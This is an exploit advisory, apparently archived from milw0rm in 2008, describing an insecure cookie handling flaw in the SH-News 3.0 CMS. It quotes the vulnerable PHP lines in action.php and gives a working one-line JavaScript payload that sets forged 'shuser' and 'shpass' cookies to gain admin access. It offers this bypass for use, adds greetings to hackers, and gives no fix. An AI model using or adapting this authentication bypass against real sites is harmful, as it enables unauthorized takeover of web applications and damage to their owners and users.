34 lines
No EOL
1 KiB
Text
34 lines
No EOL
1 KiB
Text
########################################################################
|
|
# #
|
|
# ...:::::SH-News 3.0 Insecure Cookie Handling Vulnerability ::::.... #
|
|
########################################################################
|
|
|
|
Virangar Security Team
|
|
|
|
www.virangar.net
|
|
www.virangar.ir
|
|
|
|
--------
|
|
Discoverd By :virangar security team(hadihadi)
|
|
|
|
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
|
|
|
|
& all virangar members & all hackerz
|
|
|
|
greetz:to my best friend in the world hadi_aryaie2004
|
|
& my lovely friend arash(imm02tal)
|
|
-------
|
|
vuln code in action.php:
|
|
line 66: $shuser = $HTTP_COOKIE_VARS[shuser];
|
|
line 67: $shpass = $HTTP_COOKIE_VARS[shpass];
|
|
...
|
|
line 69: if((!$shuser) || (!$shpass)) { header("Location: login.php"); }
|
|
---
|
|
exploit:
|
|
javascript:document.cookie = "shuser=1; path=/"; document.cookie = "shpass=1; path=/";
|
|
-----
|
|
now you can access to action.php whit admin access and manage the cms ;)
|
|
-------
|
|
young iranian h4ck3rz
|
|
|
|
# milw0rm.com [2008-06-15] |